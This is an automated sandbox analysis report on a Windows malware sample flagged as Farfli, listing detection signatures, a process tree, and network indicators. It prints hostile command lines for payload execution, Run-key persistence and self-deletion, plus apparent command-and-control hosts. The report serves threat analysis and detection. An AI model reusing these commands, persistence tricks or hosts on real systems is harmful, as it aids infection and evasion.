Windows Analysis Report
XgijTrY6No.exe

Overview

General Information

Sample name: XgijTrY6No.exe (renamed because original name is a hash value)
Original sample name: 02e18916d32cb641ad472bf835fa86d6a62b8e86f8838f062fd46cb4b88ccced.exe
Analysis ID: 1573195
MD5: fc2914434d6121f5e04e8e70e235c239
SHA1: 2cb4237f4c0db11c3b6d80b54c9148daeccfeed6
SHA256: 02e18916d32cb641ad472bf835fa86d6a62b8e86f8838f062fd46cb4b88ccced
Tags: 104-21-50-174, exe, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Contains functionality to infect the boot sector
Creates an autostart registry key pointing to binary in C:\Windows
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Queries disk data (e.g. SMART data)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Abnormal high CPU Usage
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after accessing registry keys)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • XgijTrY6No.exe (PID: 7372 cmdline: "C:\Users\user\Desktop\XgijTrY6No.exe" MD5: FC2914434D6121F5E04E8E70E235C239)
    • cmd.exe (PID: 7428 cmdline: cmd.exe /c ping 127.0.0.1 -n 2&C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 7480 cmdline: ping 127.0.0.1 -n 2 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • mszcy.exe (PID: 7540 cmdline: C:\Users\user\AppData\Local\Temp\\mszcy.exe "C:\Users\user\Desktop\XgijTrY6No.exe" MD5: 847CCE07E3BF3D974D1D089F5028E95F)
        • rundll32.exe (PID: 7556 cmdline: c:\windows\system32\rundll32.exe "c:\ftelcs\rjqzr.dll",QueryPluginInterface C:\Users\user\AppData\Local\Temp\mszcy.exe MD5: 889B99C52A60DD49227C5E485A016679)
  • rundll32.exe (PID: 7992 cmdline: "C:\windows\SysWOW64\rundll32.exe" "c:\ftelcs\rjqzr.dll",QueryPluginInterface MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 8020 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 8068 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 6956 cmdline: "C:\windows\SysWOW64\rundll32.exe" "c:\ftelcs\rjqzr.dll",QueryPluginInterface MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 7324 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "c:\ftelcs" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6412 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: c:\windows\SysWOW64\rundll32.exe "c:\ftelcs\rjqzr.dll",QueryPluginInterface, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7556, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EvtMgr
2024-12-11T16:27:12.315448+010028032702Potentially Bad Traffic192.168.2.960035107.163.241.20412354TCP
2024-12-11T16:27:12.315546+010028032702Potentially Bad Traffic192.168.2.960195107.163.241.20412354TCP
2024-12-11T16:27:14.565598+010028032702Potentially Bad Traffic192.168.2.961976107.163.241.20412354TCP
2024-12-11T16:27:14.661319+010028032702Potentially Bad Traffic192.168.2.962080107.163.241.20412354TCP
2024-12-11T16:27:16.330830+010028032702Potentially Bad Traffic192.168.2.964288107.163.241.20412354TCP
2024-12-11T16:27:16.330876+010028032702Potentially Bad Traffic192.168.2.964142107.163.241.20412354TCP
2024-12-11T16:27:18.565804+010028032702Potentially Bad Traffic192.168.2.965421107.163.241.20412354TCP
2024-12-11T16:27:18.674627+010028032702Potentially Bad Traffic192.168.2.965491107.163.241.20412354TCP
2024-12-11T16:27:20.346027+010028032702Potentially Bad Traffic192.168.2.951155107.163.241.20412354TCP
2024-12-11T16:27:20.346051+010028032702Potentially Bad Traffic192.168.2.951268107.163.241.20412354TCP
2024-12-11T16:27:22.580871+010028032702Potentially Bad Traffic192.168.2.952585107.163.241.20412354TCP
2024-12-11T16:27:22.721731+010028032702Potentially Bad Traffic192.168.2.952771107.163.241.20412354TCP
2024-12-11T16:27:24.470569+010028032702Potentially Bad Traffic192.168.2.954999107.163.241.20412354TCP
2024-12-11T16:27:24.470681+010028032702Potentially Bad Traffic192.168.2.955132107.163.241.20412354TCP
2024-12-11T16:27:26.706538+010028032702Potentially Bad Traffic192.168.2.956775107.163.241.20412354TCP
2024-12-11T16:27:26.832478+010028032702Potentially Bad Traffic192.168.2.956923107.163.241.20412354TCP
2024-12-11T16:27:28.486065+010028032702Potentially Bad Traffic192.168.2.958580107.163.241.20412354TCP
2024-12-11T16:27:28.486151+010028032702Potentially Bad Traffic192.168.2.958639107.163.241.20412354TCP
2024-12-11T16:27:30.893650+010028032702Potentially Bad Traffic192.168.2.960181107.163.241.20412354TCP
2024-12-11T16:27:31.035071+010028032702Potentially Bad Traffic192.168.2.960346107.163.241.20412354TCP
2024-12-11T16:27:32.502317+010028032702Potentially Bad Traffic192.168.2.962705107.163.241.20412354TCP
2024-12-11T16:27:32.502322+010028032702Potentially Bad Traffic192.168.2.962711107.163.241.20412354TCP
2024-12-11T16:27:34.738010+010028032702Potentially Bad Traffic192.168.2.963434107.163.241.20412354TCP
2024-12-11T16:27:34.846804+010028032702Potentially Bad Traffic192.168.2.963529107.163.241.20412354TCP
2024-12-11T16:27:36.517472+010028032702Potentially Bad Traffic192.168.2.964971107.163.241.20412354TCP
2024-12-11T16:27:36.517667+010028032702Potentially Bad Traffic192.168.2.964828107.163.241.20412354TCP
2024-12-11T16:27:38.760325+010028032702Potentially Bad Traffic192.168.2.950396107.163.241.20412354TCP
2024-12-11T16:27:38.863200+010028032702Potentially Bad Traffic192.168.2.950467107.163.241.20412354TCP
2024-12-11T16:27:40.533136+010028032702Potentially Bad Traffic192.168.2.951864107.163.241.20412354TCP
2024-12-11T16:27:40.533184+010028032702Potentially Bad Traffic192.168.2.952000107.163.241.20412354TCP
2024-12-11T16:27:42.768791+010028032702Potentially Bad Traffic192.168.2.953660107.163.241.20412354TCP
2024-12-11T16:27:42.880346+010028032702Potentially Bad Traffic192.168.2.953773107.163.241.20412354TCP
2024-12-11T16:27:44.569025+010028032702Potentially Bad Traffic192.168.2.955930107.163.241.20412354TCP
2024-12-11T16:27:44.569100+010028032702Potentially Bad Traffic192.168.2.955792107.163.241.20412354TCP
2024-12-11T16:27:46.815470+010028032702Potentially Bad Traffic192.168.2.957469107.163.241.20412354TCP
2024-12-11T16:27:46.957171+010028032702Potentially Bad Traffic192.168.2.957499107.163.241.20412354TCP
2024-12-11T16:27:48.707705+010028032702Potentially Bad Traffic192.168.2.958794107.163.241.20412354TCP
2024-12-11T16:27:48.707911+010028032702Potentially Bad Traffic192.168.2.958773107.163.241.20412354TCP
2024-12-11T16:27:50.940467+010028032702Potentially Bad Traffic192.168.2.959420107.163.241.20412354TCP
2024-12-11T16:27:51.050238+010028032702Potentially Bad Traffic192.168.2.959536107.163.241.20412354TCP


AV Detection

Source: XgijTrY6No.exe; Avira: detected
Source: C:\ftelcs\rjqzr.dll; Avira: detection malicious, Label: TR/Patched.Ren.Gen
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe; Avira: detection malicious, Label: TR/Farfli.ltgad
Source: C:\ftelcs\rjqzr.dll; ReversingLabs: Detection: 67%
Source: XgijTrY6No.exe; ReversingLabs: Detection: 89%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 97.6% probability
Source: C:\ftelcs\rjqzr.dll; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\mszcy.exe; Joe Sandbox ML: detected
Source: XgijTrY6No.exe; Joe Sandbox ML: detected
Source: XgijTrY6No.exe; Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Windows\SysWOW64\rundll32.exe; File created: c:\ftelcs\ReadMe.txt
Source: unknown; HTTPS traffic detected: 202.108.0.52:443 -> 192.168.2.9:49834 version: TLS 1.2
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.*.** source: rundll32.exe, 00000006.00000003.3597257344.0000000000D03000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rod.pdb\*.** source: rundll32.exe, 00000006.00000003.1813794875.0000000000D3D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1813762319.0000000000D34000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.** source: rundll32.exe, 00000006.00000003.2262348463.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000006.00000002.3803023615.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.**e source: rundll32.exe, 00000006.00000003.1572496969.0000000000D47000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1572330291.0000000000D46000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.* source: rundll32.exe, 00000006.00000003.2262330522.0000000000D42000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*.* source: rundll32.exe, 00000006.00000003.3597257344.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*.**.*** source: rundll32.exe, 00000006.00000003.3031707203.0000000005B50000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_1000B0A0 lstrcpy,lstrcat,lstrcat,lstrcat,FindFirstFileA,FindNextFileA,rand,lstrcpy,lstrcat,lstrcat,_strcmpi,GetTickCount,srand,rand,rand,rand,rand,rand,rand,rand,rand,wsprintfA,wsprintfA,WinExec,Sleep,wsprintfA,Sleep,strchr,strchr,strchr,strchr,atoi,WinExec,DeleteFileA,Sleep,lstrcat,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe; Code function: 6_2_100052A0 FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe; File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\rundll32.exe; File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\rundll32.exe; File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\rundll32.exe; File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\rundll32.exe; File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\rundll32.exe; File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Networking

Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 202.108.0.52 80
Source: C:\Windows\SysWOW64\rundll32.exe; Domain query: krnaver.com
Source: C:\Windows\SysWOW64\rundll32.exe; Network Connect: 107.163.241.204 12354
Source: global traffic; TCP traffic: 107.163.241.204 ports 1,2,3,4,5,12354
Source: unknown; Network traffic detected: HTTP traffic on port 49750 -> 12354
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 2
Source: global traffic TCP traffic: 192.168.2.9:49750 -> 107.163.241.204:12354
Source: Joe Sandbox View IP Address: 202.108.0.52
Source: Joe Sandbox View ASN Name: TAKE2US
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49887 -> 107.163.241.204:12354
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49816 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49842 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49773 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49750 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49814 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49840 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49798 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49815 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49859 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49906 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49932 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50003 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50028 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49983 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49954 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50000 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49979 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50103 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49952 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50127 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50080 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50077 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50177 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50180 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50203 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50150 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50130 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49929 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50152 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49784 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50100 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49860 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50051 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49884 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50153 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49905 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49955 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50102 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49903 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50002 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50050 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50200 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50204 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50032 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50258 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50236 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50255 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50319 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50356 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50320 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50385 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50289 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50386 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50446 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50354 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50233 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50416 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50382 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50571 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50574 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50450 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50810 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50292 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50804 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50317 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50520 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50610 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50731 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50521 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50730 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50615 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51054 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50048 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50451 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51174 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50675 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50681 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50414 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51059 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50487 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50959 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50614 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50862 -> 202.108.0.52:80
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50517 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50858 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50726 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50861 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50969 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:51165 -> 107.163.241.204:12354
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:50483 -> 107.163.241.204:12354
